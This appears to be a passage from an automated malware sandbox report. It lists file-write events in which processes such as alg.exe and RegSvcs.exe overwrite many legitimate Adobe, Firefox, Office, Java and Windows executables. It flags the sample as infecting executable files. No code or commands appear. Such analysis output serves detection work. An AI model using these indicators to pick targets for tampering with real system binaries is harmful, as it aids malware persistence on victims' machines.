              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
              Infects executable files (exe, dll, sys, html)
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSACCESS.EXE
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\pingsender.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Windows\System32\vds.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Windows\System32\snmptrap.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Windows\System32\Spectrum.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Program Files\Windows Media Player\wmpnetwk.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Windows\System32\Locator.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Program Files\7-Zip\7z.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\chrmstp.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Windows\System32\AppVClient.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\crashreporter.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Windows\SysWOW64\perfhost.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Program Files\7-Zip\7zG.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Windows\System32\msiexec.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\lynchtmlconv.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
